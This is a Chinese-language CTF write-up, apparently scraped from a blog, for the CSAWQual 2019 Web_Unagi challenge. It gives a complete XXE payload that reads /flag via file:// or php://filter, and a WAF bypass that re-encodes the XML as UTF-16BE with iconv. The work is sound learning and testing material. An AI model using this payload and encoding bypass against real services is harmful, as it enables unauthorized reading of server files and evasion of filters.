当前位置: 首页 > news >正文

营销网站的策划方案怎么做网页生成视频

营销网站的策划方案怎么做,网页生成视频,网站开发好的公司招聘,在360网站做公告怎么弄[CSAWQual 2019]Web_Unagi 1 解题流程1.1 分析1.2 解题 2 思考总结 1 解题流程 这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html 1.1 分析 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那…

[CSAWQual 2019]Web_Unagi

  • 1 解题流程
    • 1.1 分析
    • 1.2 解题
  • 2 思考总结

1

1 解题流程

这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html

1.1 分析

  1. 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那么就是XXE注入了
    2
  2. 点击about得到flag位置: Flag is located at /flag, come get it

1.2 解题

  1. 编写XXE注入文件,以xml结尾
    <?xml version='1.0'?>
    <!DOCTYPE users [
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag" >]>
    或
    <!ENTITY xxe SYSTEM "file:///flag" >]>
    <users><user><username>bob</username><password>passwd2</password><name>Bob</name><email>bob@fakesite.com</email>  <group>CSAW2019</group><intro>&xxe;</intro></user>
    </users>
    
  2. 尝试上传,发现还是被拦截了,这时候可以查询如何绕过WAF
    xml文档不仅可以用UTF-8编码,也可以用UTF-16、UTF-32和EBCDIC编码。
    在这些编码的帮助下,使用正则表达式可以很容易地绕过WAF,因为在这种类型的WAF中,正则表达式通常仅配置为单字符集。
    在linux中使用命令将xml转换为16进制
    cat 1.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml
  3. 上传即可获取flag
    flag{5325a120-326c-4829-8778-22c54362a7b4}

2 思考总结

编写xml注意点:
1、属性名大小写要区分
2、flag很长,放在其他属性中只能输出部分,而intro意为introduce个人简介,可以输出长内容

http://www.yayakq.cn/news/183925/

相关文章:

  • 网站的程序怎么做的技校网站建设与维护课程教学总结
  • 0453牡丹江信息网二手车新开网站seo
  • 大兴安岭建设局网站东莞做网站公司有哪些
  • 做网站的几个步骤网站定制排名
  • 网站自适应开发长沙装修公司性价比最高的是哪个
  • 网站建设的任务规划手机排行榜2021前十名性价比
  • 投资公司注册资金需要多少合肥做网站优化
  • 山西网站建设排名利州区住房和城乡建设部网站
  • 昆明网络推广方式有哪些重庆seo点击工具
  • 网站建设公司专业的建站优化公司阳江市招聘最新招聘
  • 谷歌推广外贸建站卖掉的网站了对方用来做违法
  • 做网站万网高密建网站
  • 中国国内网站建设哪家强网上哪个网站做的系统好用吗
  • 营销型网站的评价标准微信分销系统软件
  • 山东交通学院精品课程建设网站网络游戏大型
  • 网站开发项目实例销售网络设计案例
  • 欧美网站建设排名浦口区城乡建设集团网站
  • 电商旅游网站策划书网页设计案例大全
  • 百度搜搜网站自动显示图片四川建设厅官方网站查询
  • 方便做简笔画的网站或软件想学互联网运营从哪里入手
  • wordpress 建站建设银行网站打不开用什么浏览器
  • 企业网站开发外包合同网站建设设计咨询
  • 东乡网站建设网站必做外链
  • 网站引导制作盘锦网站建设报价
  • 企业网站的特点是自己做微商想做个网站
  • 网站建设课程下载做婚庆策划的网站
  • 网站服务体系网站索引量是什么意思
  • 属于网络营销站点推广的是诸城网站建设公司排名
  • 集团网站电子商务网站建设知识
  • 百度网站做要多少钱软件工程专业考研科目